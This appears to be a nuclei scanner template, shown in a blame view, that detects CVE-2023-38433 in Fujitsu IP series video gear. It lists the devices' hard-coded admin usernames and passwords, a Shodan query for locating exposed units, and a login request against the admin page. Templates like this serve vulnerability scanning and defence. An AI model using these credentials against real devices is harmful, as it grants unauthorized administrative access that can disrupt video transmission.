nuclei-templates/http/cves/2023/CVE-2023-38433.yaml

51 lines
1.6 KiB
YAML
Raw Normal View History

2023-09-06 15:14:55 +00:00
id: CVE-2023-38433
2023-09-06 16:05:05 +00:00
2023-09-06 15:14:55 +00:00
info:
name: Fujitsu IP Series - Hardcoded Credentials
2023-09-06 15:14:55 +00:00
author: AdnaneKhan
severity: high
description: |
2023-09-06 16:05:05 +00:00
Fujitsu Real-time Video Transmission Gear “IP series” use hard-coded credentials, which may allow a remote unauthenticated attacker to initialize or reboot the products, and as a result, terminate the video transmission. The credentials cannot be changed by the end-user and provide administrative access to the devices.
2023-09-06 15:14:55 +00:00
reference:
2023-09-06 16:05:05 +00:00
- https://www.praetorian.com/blog/fujitsu-ip-series-hard-coded-credentials
2023-09-06 15:14:55 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-38433
- https://www.cisa.gov/news-events/ics-advisories/icsa-23-248-01
2023-09-06 16:05:05 +00:00
- https://www.fujitsu.com/global/products/computing/peripheral/video/download
- https://jvn.jp/en/jp/JVN95727578
2023-09-06 15:14:55 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.5
cwe-id: CWE-798
metadata:
max-req: 1
max-request: 2
shodan-query: '"Server: thttpd/2.25b 29dec2003" content-length:1133'
2023-09-07 05:46:10 +00:00
verified: true
tags: cve,cve2023,fujitsu,ip-series
2023-09-06 15:14:55 +00:00
http:
- raw:
2023-09-06 16:05:05 +00:00
- |
GET /b_download/index.html HTTP/1.1
Host: {{Hostname}}
2023-09-07 05:46:10 +00:00
Authorization: Basic {{base64(username + ':' + password)}}
attack: pitchfork
payloads:
username:
- fedish264pro
- fedish265pro
password:
- h264pro@broadsight
- h265pro@broadsight
2023-09-06 15:14:55 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Field Support'
- type: status
status:
2023-09-06 15:24:32 +00:00
- 200